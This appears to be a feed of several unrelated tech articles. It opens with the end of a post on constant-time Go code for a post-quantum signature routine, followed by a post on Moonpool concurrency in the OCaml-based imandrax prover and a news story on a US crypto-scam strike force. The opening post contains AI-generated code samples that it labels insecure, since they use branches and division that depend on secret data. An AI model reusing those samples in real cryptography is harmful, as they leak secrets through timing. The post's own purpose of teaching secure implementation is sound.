    }

    // Compute r0 = r - r1*alpha
    r0 = r - r1*alpha

    // Adjust r1 if r0 is too large
    if r0 > alpha/2 {
        r1++
        r0 -= alpha
    } else if r0 < -alpha/2 {
        r1--
        r0 += alpha
    }

    return r1, r0
}

However, this violates cryptography engineering best practices:

  1. This code flagrantly uses division and modulo operators.
  2. It contains several branches based on values derived from the field element.

Zen and the art of branchless cryptography

The straightforward approach to preventing branches in any cryptography algorithm is to always perform both sides of the condition (true and false) and then use a constant-time conditional swap based on the condition to obtain the correct result. This involves bit masking, two’s complement, and exclusive OR (XOR).

Removing the branches from this function looks something like this:

// This is another AI-generated code sample.
// Not secure -- DO NOT USE.
func DecomposeUnsafeBranchless(r, alpha int32) (r1, r0 int32) {
    // Ensure r is in range [0, q-1]
    r = r % q
    r += q & (r >> 31) // Add q if r < 0 (using arithmetic right shift)

    // Center r around 0 (map to range [-(q-1)/2, (q-1)/2])
    mask := -((r - (q-1)/2 - 1) >> 31) // mask = -1 if r > (q-1)/2, else 0
    r -= q & mask

    // Compute r1 = round(r/alpha) with ties broken towards zero
    // For r >= 0: r1 = (r + alpha/2) / alpha
    // For r < 0:  r1 = (r - alpha/2 + 1) / alpha
    signMask := r >> 31                           // signMask = -1 if r < 0, else 0
    offset := (alpha/2) + (signMask & (-alpha/2 + 1)) // alpha/2 if r >= 0, else -alpha/2 + 1
    r1 = (r + offset) / alpha

    // Compute r0 = r - r1*alpha
    r0 = r - r1*alpha

    // Adjust r1 if r0 is too large (branch-free)
    // If r0 > alpha/2: r1++, r0 -= alpha
    // If r0 < -alpha/2: r1--, r0 += alpha

    // Check if r0 > alpha/2
    adjustUp := -((r0 - alpha/2 - 1) >> 31) // -1 if r0 > alpha/2, else 0
    r1 += adjustUp & 1
    r0 -= adjustUp & alpha

    // Check if r0 < -alpha/2
    adjustDown := -((-r0 - alpha/2 - 1) >> 31) // -1 if r0 < -alpha/2, else 0
    r1 -= adjustDown & 1
    r0 += adjustDown & alpha

    return r1, r0
}

That solves our conditional branching problem; however, we aren’t done yet. There are still the troublesome division operators.

Undivided by time: Division-free algorithms

The previous trick of constant-time conditional swaps can be leveraged to implement integer division in constant time as well.

func DivConstTime32(n uint32, d uint32) (uint32, uint32) {
    quotient := uint32(0)
    R := uint32(0)

    // We are dealing with 32-bit integers, so we iterate 32 times
    b := uint32(32)
    i := b
    for range b {
        i--
        R <<= 1

        // R(0) := N(i)
        R |= ((n >> i) & 1)

        // swap from Sub32() will look like this:
        // if remainder > d,  swap == 0
        // if remainder == d, swap == 0
        // if remainder < d,  swap == 1
        Rprime, swap := bits.Sub32(R, d, 0)

        // invert logic of sub32 for conditional swap
        swap ^= 1
        /*
            Desired:
                if R > D  then swap = 1
                if R == D then swap = 1
                if R < D  then swap = 0
        */

        // Qprime := Q
        // Qprime(i) := 1
        Qprime := quotient
        Qprime |= (1 << i)

        // Conditional swap:
        mask := uint32(-swap)
        R ^= ((Rprime ^ R) & mask)
        quotient ^= ((Qprime ^ quotient) & mask)
    }
    return quotient, R
}

This works as expected , but it’s slow, since it requires a full loop iteration to calculate each bit of the quotient and remainder. We can do better.

One neat optimization trick: Barrett reduction

Since the value $γ_2$ is fixed for a given parameter set, and the division and modulo operators are performed against $2γ_2$, we can use Barrett reduction with precomputed values instead of division.

Barrett reduction involves multiplying by a reciprocal (in our case, $2^{64}/2γ_2$) and then performing up to two corrective subtractions to obtain a remainder. The quotient is produced as a byproduct of this calculation.

// Calculates (n/d, n%d) given (n, d)
func DivBarrett(numerator, denominator uint32) (uint32, uint32) {
    // Since d is always 2 * gamma2, we can precompute (2^64 / d) and use it
    var reciprocal uint64
    switch denominator {
    case 190464: // 2 * 95232
        reciprocal = 96851604889688
    case 523776: // 2 * 261888
        reciprocal = 35184372088832
    default:
        // Fallback to slow division
        return DivConstTime32(numerator, denominator)
    }

    // Barrett reduction
    hi, _ := bits.Mul64(uint64(numerator), reciprocal)
    quo := uint32(hi)
    r := numerator - quo * denominator

    // Two correction steps using bits.Sub32 (constant-time)
    for i := 0; i < 2; i++ {
        newR, borrow := bits.Sub32(r, denominator, 0)
        correction := borrow ^ 1  // 1 if r >= d, 0 if r < d
        mask := uint32(-correction)
        quo += mask & 1
        r ^= mask & (newR ^ r)  // Conditional swap using XOR
    }

    return quo, r
}

With this useful function in hand, we can now implement Decompose without branches or divisions .

Toward a post-quantum secure future

The availability of post-quantum signature algorithms in Go is a step toward a future where internet communications remain secure, even if a cryptography-relevant quantum computer is ever developed.

If you’re interested in high-assurance cryptography, even in the face of novel adversaries (including but not limited to future quantum computers), contact our cryptography team today.

Moonpool and OCaml5 in Imandrax

Lobsters
docs.imandra.ai
2025-11-14 15:20:53
Comments...
Original Article

by Simon Cruanes (@c-cube) on Nov 12, 2025.

Introduction

OCaml 5.0 was released in December 2022, with exciting new features for concurrency in OCaml. The community reacted, as befits OCaml, by starting multiple new concurrency libraries such as Eio, Miou, picos, Domainslib, Abb (announce), and my (@c-cube) own library, Moonpool.

In this blog post I will explain how we use Moonpool at Imandra in our next-generation proof assistant, imandrax.

Imandrax is a proprietary proof assistant and automated prover that underpins much of our internal operations. It is based on a pure subset of OCaml and combines techniques from the Boyer-Moore world (as seen in ACL2) and SMT solvers, in our case using Z3 via its OCaml bindings. Imandrax can be used either from the command line, from an editor using its integrated Language Server (LSP), or via an HTTP API for programmatic use. For context, the project clocks in at around 108 kloc of OCaml even before considering dependencies. Below is a screenshot of our VSCode plugin, showing a simple proof in imandrax.

A screenshot of VScode with a proof

With that out of the way, let’s talk about concurrency and parallelism in OCaml and then in imandrax!

Brief overview of concurrency in OCaml 4.xx

Historically, concurrency in OCaml 4.xx and earlier was done in one of the following ways:

  • System threads, but with a GIL-like runtime lock which prevents two threads from running in parallel (unless one of them is inside a lock-releasing C call). This means only one core can be used by a given process, and it also often means using blocking IO primitives. In OCaml it could look like this:

      let handle_client (input:in_channel) (output:out_channel) : unit =
        try
          while true do
            let line = input_line input in
            Printf.printf "read %S from client.\n" line;
            output_string output (String.uppercase_ascii line ^ "\n")
          done
        with End_of_file -> ()
    
      (* in the server accept loop *)
      let th: Thread.t = Thread.create (fun () -> handle_client input output) ()
    
  • Cooperative concurrency via Lwt or Jane Street’s Async. This style builds on some system event loop (epoll, kqueue, etc.) to schedule promises, and provides a concurrency monad to chain the promises together. It unlocks asynchronous IOs and can potentially enable higher levels of concurrency than plain threads, but it’s still limited to a single core and can lead to some interesting bugs if an expensive CPU-bound task runs in the event loop.

    The monadic style would look like this (some error handling omitted):

      let rec handle_client input output : unit Lwt.t =
        Lwt_io.read_line_opt input >>= fun line_opt ->
        match line_opt with
        | None -> Lwt.return () (* done *)
        | Some line ->
          Lwt_io.write_line output (String.uppercase_ascii line) >>= fun () ->
          handle_client input output
    

    There are preprocessors and other ways to prettify the code, but ultimately this is what the code is like. Among other downsides, stack traces are completely useless for exceptions raised from Lwt programs.

The most active web framework for OCaml, Dream, is based on Lwt and thus, on Linux, on epoll.

Direct-style concurrency on OCaml5

With OCaml5 we’re seeing direct-style concurrency rise through the use of algebraic effects. This means, in effect, no more concurrency monad: instead of chaining promises together, some form of await can be used to suspend the current fiber/task until a promise is resolved.

Eio: Lwt’s replacement?

The most popular OCaml5 concurrency library is probably Eio, which provides lightweight fibers on top of an event loop (epoll, io_uring, kqueue, etc.).

An example taken directly from the README:

# let main _env =
  Fiber.both
    (fun () -> for x = 1 to 3 do traceln "x = %d" x; Fiber.yield () done)
    (fun () -> for y = 1 to 3 do traceln "y = %d" y; Fiber.yield () done) ;;

# Eio_main.run main
+x = 1
+y = 1
+x = 2
+y = 2
+x = 3
+y = 3
- : unit = ()

Here we see that two distinct fibers (lightweight cooperative tasks) are started concurrently. Each of them, in a loop, prints a message, and yields to the scheduler, thus allowing the other fiber to have a turn.

Further down in the README we see:

let cli ~stdin ~stdout =
  let buf = Eio.Buf_read.of_flow stdin ~initial_size:100 ~max_size:1_000_000 in
  while true do
    let line = Eio.Buf_read.line buf in
    traceln "> %s" line;
    match line with
    | "h" | "help" -> Eio.Flow.copy_string "It's just an example\n" stdout
    | x -> Eio.Flow.copy_string (Fmt.str "Unknown command %S\n" x) stdout
  done

It’s clearly direct style: a while loop, IO operations resemble normal function calls, no monad in sight, stack traces are nice and pretty. Eio normally still runs on a single thread, even though it has some facilities to manage a domain pool for background tasks.

This is not intended as a full introduction to Eio, but we can mention a few more things before moving on:

  • it is very opinionated and forces users to thread a set of capabilities around IO operations. The 0.1 announce spilled a lot of ink on that topic.
  • it implements structured concurrency . See Trio for a very readable overview of this neat topic.
  • it defaults to io_uring on Linux.
  • it has a neat tracing system based on OCaml’s new Runtime_events system.

Domains

A subtle aspect of OCaml5’s new support for multicore programming is that there are both the pre-existing threads and the new concept of domains. The go-to library for domain-based parallelism is domainslib.

Domains are heavier threads that have their own slice of the runtime and can actually run in parallel. Each domain might have multiple threads that share its runtime slice and cannot run in parallel with one another.

It is recommended to not have more domains than CPU cores. This makes domains a very scarce resource, unlike threads, and it means it can be bad practice for a library to start domains unilaterally.
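
To make the distinction concrete, here is a small illustrative sketch (not from the original post) that uses only the stdlib Domain module: the two spawned domains genuinely run in parallel, and Domain.recommended_domain_count gives the ceiling you should stay under.

(* spawn two domains, let them crunch in parallel, then join their results *)
let () =
  Printf.printf "at most %d domains are recommended on this machine\n"
    (Domain.recommended_domain_count ());
  let fib_slow k =
    (* deliberately naive, CPU-bound work *)
    let rec go k = if k < 2 then k else go (k - 1) + go (k - 2) in
    go k
  in
  let d1 = Domain.spawn (fun () -> fib_slow 32) in
  let d2 = Domain.spawn (fun () -> fib_slow 33) in
  (* Domain.join blocks until the spawned computation returns *)
  Printf.printf "results: %d %d\n" (Domain.join d1) (Domain.join d2)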

Moonpool

So where does Moonpool fit in this landscape? Moonpool was designed to bypass the lack of compositionality of domains, by allowing multiple thread pools to co-exist while spreading their threads over multiple domains. Moonpool was first released in June 2023 (initial announce for its 0.1) under the MIT license, and has been continuously developed since. The development was driven in no small part by our use of it in imandrax.

The core concept of Moonpool is Moonpool.Runner.t, alongside a promise type 'a Moonpool.Fut.t. Here is a very simplified view of Moonpool’s main interface (read the docs here):

(** thread-safe promises *)
module Fut : sig
  type 'a t
  (** a promise returning a ['a] *)

  val await : 'a t -> 'a
  (** suspend the caller task until promise is resolved,
      then get the promise's result. *)

  val make : unit -> 'a t

  val fulfill : 'a t -> 'a -> unit
end

(** A task to run on a thread pool *)
type task = unit -> unit

(** The interface for runners *)
module Runner : sig
  type t = {
    run_async: task -> unit;
    shutdown: unit -> unit;
    size: unit -> int;
    num_tasks: unit -> int;
  }
end

(** runs a task on the given pool *)
val run_async : Runner.t -> task -> unit

(** spawn a task on the given pool, returning a promise *)
val spawn : Runner.t -> (unit -> 'a) -> 'a Fut.t

(** create a new work stealing pool *)
val ws_pool : ?num_threads:int -> unit -> Runner.t

So the user can create one or more pools (the type Runner.t ) of worker threads, and then run task s on them, either with run_async or spawn . These workers are preemptive, not cooperative, based on Thread.t . It’s fine to have hundreds of workers spread among multiple pools even on a 16 core machine, which means you can have multiple pools without having to worry about exceeding 16 workers like you’d do if they used a full domain.

There is currently no dedicated IO facility; the focus is on CPU-heavy tasks.
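
As a quick, hypothetical usage sketch (not from the original post), here is roughly what this looks like in practice, mirroring the calls used in the pi benchmark below; the let@ binder is the one defined later in the article, and exact signatures may differ slightly from the simplified view above.

let ( let@ ) = ( @@ )

let parallel_sum_of_squares (xs : int list) : int =
  (* a work-stealing pool of worker threads, shut down when the scope exits *)
  let@ pool = Moonpool.Ws_pool.with_ () in
  (* run one task on the pool and block the caller until it completes *)
  Moonpool.Ws_pool.run_wait_block pool (fun () ->
      (* spawn one sub-task per element, then await all the promises *)
      xs
      |> List.map (fun x -> Moonpool.Fut.spawn ~on:pool (fun () -> x * x))
      |> List.fold_left (fun acc fut -> acc + Moonpool.Fut.await fut) 0)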

To summarize some of the design points:

  • explicit Runner.t interface, so it’s possible to choose on which pool a particular task runs, and have multiple possible implementations of such runners;
  • use OCaml5’s effects to be able to await a promise, provide parallel primitives, etc. without monadic contamination and while preserving stack traces;
  • the promises are thread safe and can be awaited from other runners safely. Promises come from picos, an attempt at defining common foundations for the various multicore libraries in the interest of cross-compatibility.

More on the design and goals of Moonpool can be found on the initial release announce over discuss .

An example with Moonpool: basic approximation of π

One of the basic benchmarks in Moonpool computes a (simple) approximation of pi using floats. The parallel approach leads to an 11x speedup on my Intel i7-12700, with a variant of the code below.

Code for computing a float approximation of pi:

(* sequential version: *)
let run_sequential (num_steps : int) : float =
  let@ _trace_span = Trace.with_span ~__FILE__ ~__LINE__ "pi.seq" in
  let step = 1. /. float num_steps in
  let sum = ref 0. in
  for i = 0 to num_steps - 1 do
    let x = (float i +. 0.5) *. step in
    sum := !sum +. (4. /. (1. +. (x *. x)))
  done;
  let pi = step *. !sum in
  pi

(* parallel version using fork-join over some Moonpool runner,
   via a "parallel for" primitive *)
let run_fork_join num_steps : float =
  let@ pool = Moonpool.Ws_pool.with_ () in
  let num_tasks = Ws_pool.size pool in
  let step = 1. /. float num_steps in
  let global_sum = Lock.create 0. in
  (* start a task on the pool and block until it's done *)
  Ws_pool.run_wait_block pool (fun () ->
      (* parallel for, running on the pool and await-ing the subtasks *)
      Moonpool_forkjoin.for_
        ~chunk_size:(3 + (num_steps / num_tasks))
        num_steps
        (fun low high ->
          let sum = ref 0. in
          for i = low to high do
            let x = (float i +. 0.5) *. step in
            sum := !sum +. (4. /. (1. +. (x *. x)))
          done;
          let sum = !sum in
          Lock.update global_sum (fun n -> n +. sum)));
  let pi = step *. Lock.get global_sum in
  pi

And hyperfine tells us:

  ./_build/default/benchs/pi.exe -n 100_000_000 -mode forkjoin -kind=pool ran
   11.07 ± 1.36 times faster than ./_build/default/benchs/pi.exe -n 100_000_000 -mode=seq

Moonpool in imandrax

Right, so, where were we? We were talking about imandrax, a proof assistant with a heavy focus on proof automation.

The motivation for all this elaborate thread pool dance is simple: proof automation is really CPU heavy, and we wanted to run it in background tasks. In 2025, blocking the whole REPL because we’re asking Z3 to find a counter-model feels suboptimal. Even worse would be to block the LSP server and render it unresponsive while we check theorems in the current editor buffer, or to block the whole HTTP server while processing an API call!

So, we use Moonpool to run most of the non-trivial computations in thread pools.

  • In a large portion of the codebase, a Moonpool.Runner.t is in scope so it can be used to accelerate basic computations. Such tasks include, among others:
    • (de)compressing a list of blobs using zlib , using fork-join to parallelize the work
    • traversing the user’s project tree to find dune files (we walk the directory tree in parallel, one task per sub-directory)
    • various other parallel graph traversals (e.g. computing dependencies between content-addressed serialized values)
  • Parsing, typechecking, and the initial computation of proof obligations (“POs”) is done with file-level parallelism. If we check file d.iml and it imports files a.iml , b.iml , and c.iml , we will parse and typecheck these in parallel background tasks. This becomes more impactful for larger developments with many files.
  • LSP queries are processed in their individual tasks in a dedicated thread pool, which is kept separate from the normal background-task pool.
  • For the HTTP server, we currently spawn a thread per connection because some of them might be long-lived. HTTP isn’t currently a bottleneck for us.
  • The main function still runs in a (trivial) Moonpool runner: we call Moonpool_fib.main the_real_main and it calls the_real_main immediately. The point of this is that it installs effect handlers so that we can call Moonpool.Fut.await from within the main function, too.

Here’s a trace of an execution of imandrax-cli (visualized with perfetto, produced using heavy ocaml-trace instrumentation):

perfetto trace

  • on the left, the thin pink bands are the initial traversal of the source directory to look for dune files.
  • on the right, the selected blue area contains a bunch of tasks that decompress zlib blobs and perform some Blake3 hashing for content-addressing purposes.
  • in the center, the parsing, typechecking and subsequent computation of POs for two modules. It’s sequential because each PO depends on the previous one.

Here’s a trace of parallel typechecking and PO computation in the LSP server, after opening a large development in VSCode:

perfetto trace for the LSP

Some tasks are still very sequential! But do note that the tasks on the left are spread between multiple worker threads. We also have parallel compression on the right (the green bands). The LSP server also uses background tasks for parallel parsing, LSP query handling, etc.

Running the proof obligations

Funnily enough, we started using Moonpool for a use case that’s not served by it anymore: actual theorem proving.

The heavy computations associated with theorem proving (Boyer-Moore style waterfall, SMT solving, simplifications, rewriting, etc.) used to run directly on a thread pool, but now run in worker sub-processes.

There are multiple reasons for that. The Z3 OCaml bindings are fiddly and might leak memory or, even worse, segfault. Enforcing timeouts can be tricky. It makes sense to isolate the heavy lifting in a disposable sub-process so that crashes or leaks don’t affect the main imandrax process. Once the sub-process dies, the OS cleans up.

Here is a trace obtained by running the imandrax cli on a problem:

trace with multiple worker processed

We can see the thin long blue line: that’s the main process. The other lines are individual worker processes that it spawned. Each worker has its own small thread pool for basic concurrency needs. Some workers can live for a while.

Parallelization levels

Running tasks in parallel like this doesn’t purely measure Moonpool’s performance, because the proof obligations themselves are solved in worker subprocesses. Still, we can see that with at most 8 worker processes at a time, imandrax manages to use 8.2 CPU cores on a decomposition task.

$ perf stat ./_build/default/src/cli/imandrax_cli.exe check test/iml/decomp.iml -j 8
Success: 59/59 POs succeeded.

 Performance counter stats for './_build/default/src/cli/imandrax_cli.exe check test/iml/decomp.iml -j 8':

    31,831,740,539      task-clock:u                     #    8.248 CPUs utilized
    […]

       3.859512934 seconds time elapsed

Moonpool’s influence on the codebase

So, that’s how we use Moonpool as the foundation for concurrency in imandrax. Since the previous system was REPL-based and sequential, we had the opportunity to learn a lot by experimenting with this new world of direct-style concurrency. (…new in OCaml, anyway)

Over time, we’ve converged on some useful patterns. They might not be universally applicable but they do work for us. Some of them are well known! Here’s a few:

Local mutation, immutable long-lived data.

Data that is serialized, passed to other tasks, kept for a long time, etc. is immutable in most cases. We don’t want to needlessly worry about race conditions.

On the other hand, when processing a single task, we use a lot of mutations, probably more than the average OCaml program. We just make sure they don’t escape 😁.

Runners are passed explicitly

A lot of the code is passed some sort of context or state (a record with… stuff). It often includes a Moonpool.Runner.t for concurrency needs. There is not much global state, and no global runner.

Switches

We have a Switch.t type that’s loosely inspired by Lwt_switch.t:

type t [@@deriving show]
(** A thread-safe switch for cancellation *)

val create : ?parent:t -> unit -> t
(** New switch.
    @param parent
      inherit from this switch. It means that the result switches off if the
      parent does, but conversely we can turn the result off without affecting
      the parent. In other words, this switch's lifetime is a subset of the
      parent's lifetime *)

val on_turn_off : t -> (unit -> unit) -> unit
(** [on_turn_off sw f] will call [f()] when [sw] is turned off. If [sw] is
    already off then [f()] is called immediately. {b NOTE} [f] really should not
    fail. *)

val is_on : t -> bool
val is_off : t -> bool

val turn_off : t -> unit
(** If it was on, turn the switch off and call all the callbacks. *)

We pass this around in much of the code base as an ~(active:Switch.t) parameter, or as part of a larger context record. Resources can be registered for cleanup on the current switch (useful in a concurrent context where RAII-ish isn’t always suitable).

In CPU-bound tasks, it is on us to regularly check that the switch is on, and exit early if it’s off. Cancellation is a hard problem!
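
Here is a hypothetical sketch (not from the original post) of what that cooperative polling looks like with the Switch.t interface above; heavy_step and the polling interval are made up for illustration, and imandrax would raise through its own Error module rather than failwith.

let crunch ~(active : Switch.t) (items : int list) : int =
  let heavy_step x = x * x (* stand-in for real work *) in
  let acc = ref 0 in
  List.iteri
    (fun i x ->
      (* poll the switch every 1000 items so cancellation stays reasonably prompt *)
      if i mod 1000 = 0 && Switch.is_off active then failwith "interrupted";
      acc := !acc + heavy_step x)
    items;
  !acc

let () =
  let active = Switch.create () in
  Switch.on_turn_off active (fun () -> print_endline "turning off");
  (* e.g. an LSP "cancel request" handler would call [Switch.turn_off active] *)
  Printf.printf "sum of squares: %d\n" (crunch ~active [ 1; 2; 3 ])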

Compute/IO segregation

We try to reduce the amount of “shotgun IOs” we do. A worker subprocess, responsible for processing one (1) task, will thus:

  • read the entirety of the serialized task and its (bundled) dependencies, from the parent process, on stdin . The parent process already took care of the bundling so we don’t have to do a back and forth.
  • deserialize the task description into usable logic structures.
  • actually process the task, calling Z3, running a refinement loop, inductive waterfall, etc. where all the magic happens. The only IO we do here is sending progress updates to the parent, logging, and tracing.
  • serialize results.
  • write serialized results on stdout for the parent to read.

RAII-ish

This is a bit of OCaml inside-baseball. For safe resource handling, we often adopt this pattern:

(* [let@ x = e1 in e2] is the same as [e1 (fun x -> e2)] *)
let (let@) = (@@)

(* look at this cleanup! *)

let example1 =
  let@ input = CCIO.with_file_in "foo.txt" in
  process input
(* file handle closed here *)

let example2 =
  (* acquire a DB connection from a pool *)
  let@ db_conn = Db_pool.with_connection db_pool in
  (* run a query using the connection *)
  run_sql db_conn "select a, b from whatever;"
(* DB connection returned to pool here, at scope exit *)

It works surprisingly well to make sure we don’t leak resources, as long as the resources’ lifetimes are purely lexical in scope. We use this for locks, tracing spans, error handlers, database connections, client sockets, etc.
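
For illustration, here is a hypothetical sketch (not from the original post) of the provider side of this pattern: any function written in with_-style, here built on the stdlib’s Fun.protect, can be consumed with let@ in exactly the same way.

(* a with_-style combinator: time a scope, even if it raises *)
let with_timer name (f : unit -> 'a) : 'a =
  let t0 = Sys.time () in
  Fun.protect
    ~finally:(fun () ->
      Printf.printf "%s took %.3fs of CPU time\n%!" name (Sys.time () -. t0))
    f

let example3 () =
  let@ () = with_timer "expensive step" in
  (* ... do the expensive thing here ... *)
  ()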

RAII-ish Lock

Whenever we have actual shared data (some tables in parallel graph traversals, etc.) we use this small mutex wrapper:

module Lock = struct
  type 'a t = {
    mutex: Mutex.t;
    mutable content: 'a;
  }

  let create content : _ t = { mutex = Mutex.create (); content }

  let with_lock (self:_ t) f =
    Mutex.protect self.mutex (fun () -> f self.content)
end

let my_tbl: (string, bool) Hashtbl.t Lock.t =
  Lock.create @@ Hashtbl.create 32

let some_task () =
  (* RAII-ish, as above *)
  let@ tbl = Lock.with_lock my_tbl in
  Hashtbl.add tbl "cool" true
(* lock released here *)

We also have a similar wrapper called 'a Immlock.t , designed for immutable values only. It’s a bit like a generalized 'a Atomic.t value. The read path is a single atomic read, whereas the update path uses a regular lock to serialize writers. Writers don’t block readers, which will just read the current value. Since our long lived values tend to be immutable, a 'a Immlock.t can be used for intermediate computations, only for its content to be returned as-is at the end.

(* immlock.ml*)

type 'a t = {
  content: 'a Atomic.t;  (** Quickly access immutable data *)
  mutex: Mutex.t;  (** only used for updates *)
}

let[@inline] get self = Atomic.get self.content

let update self f =
  Mutex.protect self.mutex (fun () ->
    let res = f (Atomic.get self.content) in
    Atomic.set self.content res)

let update_map self f =
  Mutex.protect self.mutex (fun () ->
    let res, y = f (Atomic.get self.content) in
    Atomic.set self.content res;
    y)

Critical sections

Talking about locks, you know what’s bad? Holding a lock across an await. Don’t do it. That’s it.

In general, critical sections (the scope inside let@ foo = Lock.with_lock locked_foo in … ) must be as short and side-effect free as possible.
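
To make the pitfall concrete, here is a hypothetical sketch (not from the original post) using the Lock wrapper and my_tbl from above; compute stands in for any operation that returns a promise.

(* BAD: the mutex stays held while this task is suspended on [await],
   so every other task that needs [my_tbl] is blocked for the whole duration *)
let record_result_bad (compute : unit -> bool Moonpool.Fut.t) =
  let@ tbl = Lock.with_lock my_tbl in
  let ok = Moonpool.Fut.await (compute ()) in
  Hashtbl.replace tbl "result" ok

(* BETTER: await first, then take the lock only for the short update *)
let record_result_good (compute : unit -> bool Moonpool.Fut.t) =
  let ok = Moonpool.Fut.await (compute ()) in
  let@ tbl = Lock.with_lock my_tbl in
  Hashtbl.replace tbl "result" ok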

Thread-local storage

There still isn’t any official support for thread-local storage in OCaml despite various past attempts. I think it’s pretty unfortunate, but meanwhile there’s a workaround implemented in a library. It has worked fine for us in various places in Moonpool, but it would be better to have official support in the long term.

Case study: Parse_import_graph

This might all be a bit abstract, so let’s look at an illustrative example of what our use of Moonpool looks like in practice. Imandrax has an in-file import syntax (instead of relying on a build system, the way OCaml does). The syntax is, in the most basic case, [@@@import "foo/bar.iml"] .

There are situations where we want to parse a file and transitively find all its dependencies, each resolved into Abspath.t values (absolute, normalized file paths). A slightly simplified version of the implementation for that feature goes like this:


(** Imports for a given file *)
type per_file = {
  imports: Import.t list; (** Resolved imports for this file *)
  import_errors: (T_loc.t * Error.t) list; (** Import errors, with locations *)
}
[@@deriving show]

(** Result of analyzing the transitive import graph *)
type t = {
  files: per_file Abspath.Map.t;
  files_not_found: Str_set.t;
}

(** Internal state for the computation *)
type state = {
  active: Switch.t;
  runner: Moonpool.Runner.t;
  not_found: Str_set.t Immlock.t;
  files: per_file Abspath.Map.t Immlock.t;
  files_seen: Abspath.Set.t Immlock.t;
}

(** Graph traversal *)
let rec analyze_file (self : state) (p : Abspath.t) : unit Moonpool.Fut.t =

  (* closure to actually parse file at path [p], in a background task *)
  let actually_run () : unit Moonpool.Fut.t =
    let@ () = Moonpool.Fut.spawn ~on:self.runner in
    let@ _trace_span =
      Trace_async.with_span ~level:Info ~__FILE__ ~__LINE__
        "parse-import.analyze-file"
        ~data:(fun () -> [ "path", `String (p :> string) ])
    in

    if Switch.is_off self.active then
      Error.failf ~kind:Error_kind.interrupted "Interrupted.";

    (* the actual parsing *)
    let phrases, _, _ = Parsing.parse_file ~path:p () in
    let imports, import_errors = Parsing.imports_of_phrases phrases in

    (* save result *)
    let per_file = { imports; import_errors } in
    Immlock.update self.files (Abspath.Map.add p per_file);

    (* analyze imports in sub-tasks, in parallel,
       and wait for them to terminate *)
    List.map
      (fun (imp : Import.t) ->
        analyze_file self (imp.import_abs_path :> Abspath.t))
      imports
    |> List.iter Moonpool.Fut.await
  in

  let already_processed =
    (* atomically check if we're the first task to check this file,
        and if so add it to the set of processed files *)
    Immlock.update_map self.files_seen (fun s ->
        Abspath.Set.add p s, Abspath.Set.mem p s)
  in

  if already_processed then
    Moonpool.Fut.return ()  (* no-op *)
  else
    actually_run ()

let run ~active ~runner ~(file : Abspath.t) () : t Error.result =
  (* catch errors, returns results *)
  let@ () = Error.guards "parsing import graph" in
  let@ _trace_span =
    Trace.with_span ~__FILE__ ~__LINE__ "parse-import-graph.main"
  in

  let st : state = {
    active;
    runner;
    not_found = Immlock.create Str_set.empty;
    files = Immlock.create Abspath.Map.empty;
    files_seen = Immlock.create Abspath.Set.empty;
  } in

  analyze_file st file |> Moonpool.Fut.await;
  {
    files_not_found = Immlock.get st.not_found;
    files = Immlock.get st.files;
  }

As we can see, the graph traversal relies on Fut.spawn to explore the dependencies of the current file in parallel; it has some shared state built on Immlock.t (to make sure we don’t explore a file more than once); there’s a layer of tracing using ocaml-trace; and there’s a basic form of cancellation handling using a Switch.t.

This version doesn’t warn the user about cyclic dependencies, but we do check for that at typechecking time.

What about async IOs?

I’ll keep this section relatively short. The gist is: we still currently use blocking IOs, as our system is generally CPU-bound. For HTTP handlers, we spawn a thread (some HTTP endpoints use a websocket, potentially long-lived, which would quickly starve a thread pool). For local file IOs and the LSP, threads are more than enough.

Still, we are experimenting with Moonpool_lwt (announced here), a Moonpool.Runner.t that runs on, and wraps, Lwt_main.run. It is compatible with all the Moonpool concurrency primitives we use (including await-ing futures that run on the various background thread pools), but it also allows await-ing any Lwt.t promise, such as IO primitives handled by the Lwt event loop (backed by epoll on Linux). We could also use any Lwt-based library such as Dream, but still write each HTTP handler in direct style.

We’re not using Eio, mostly because it’s not (yet?) compatible with Moonpool and is a large, opinionated library in itself. Our initial needs were driven by parallelization, which isn’t what Eio was designed for.

Conclusion

That was quite a lot! It’s great to finally have multicore support in OCaml, but the ecosystem and best practices around it are still solidifying, and various people and groups are exploring alternative libraries and approaches. For us, Moonpool has been working fairly well.

[$] A struct sockaddr sequel

Linux Weekly News
lwn.net
2025-11-14 15:10:05
One of the many objectives of the Linux Kernel Self-Protection Project (KSPP), which just completed ten years of work, is to ensure that all array references can be bounds-checked, even in the case of flexible array members, the size of which is not known at compile time. One of the most challengin...

Oracle hit hard in Wall Street's tech sell-off over its AI bet

Hacker News
www.ft.com
2025-11-14 15:04:22
Comments...

US announces new strike force targeting Chinese crypto scammers

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 14:54:30
U.S. federal authorities have established a new task force to disrupt Chinese cryptocurrency scam networks that defraud Americans of nearly $10 billion annually. [...]...
Original Article

Cryptocurrency

U.S. federal authorities have established a new task force to disrupt Chinese cryptocurrency scam networks that defraud Americans of nearly $10 billion annually.

The Scam Center Strike Force team, supported by agents from the U.S. Attorney's Office, the Department of Justice, the FBI, and the Secret Service, investigates and prosecutes criminal groups operating large-scale cryptocurrency investment scams (also known as pig butchering or romance baiting ) and money laundering campaigns from criminal compounds across Southeast Asia.

The strike team focuses on tracing illicit funds, seizing scammers' cryptocurrency, and coordinating with international partners to dismantle the infrastructure supporting their operations.


Chinese transnational criminal rings behind these scams use social media and text messages to gain victims' trust before tricking them into transferring cryptocurrency into fraudulent investment platforms.

The scammers often work from compounds in Cambodia, Laos, and Burma, where workers are frequently victims of human trafficking, held against their will, and forced to target potential victims worldwide. In some countries where these compounds are based, scam-generated revenue often accounts for nearly half the nation's gross domestic product (GDP), the Justice Department said.

"Scam centers are creating a generational wealth transfer from Main Street America into the pockets of Chinese organized crime," U.S. Attorney Jeanine Ferris Pirro stated . "As the prosecuting office in the nation’s capital, my office has the authority to charge foreign defendants and seize foreign property."

"In fiscal year 2025 alone, the U.S. Secret Service has responded to approximately 3,000 victims who contacted us regarding cryptocurrency investment schemes," added Assistant Director Kyo Dolan of the United States Secret Service.

$401 million in cryptocurrency already seized

While the strike force has just been announced, it has already seized over $401 million in cryptocurrency and filed forfeiture proceedings for an additional $80 million in stolen funds. The strike force's Burma team has also seized websites and is now seeking warrants to seize satellite terminals used for money laundering and other forms of fraud.

On Wednesday, the Treasury Department’s Office of Foreign Assets Control imposed sanctions on the armed group Democratic Karen Benevolent Army (DKBA) and four of its senior leaders for running cyber-scam operations in Burma that specifically target U.S. citizens.

It also sanctioned Thailand-based firms Trans Asia International Holding Group Thailand Company Limited and Troth Star Company Limited, as well as Thai national Chamu Sawang, all linked to Chinese criminal rings that finance the DKBA's operations.

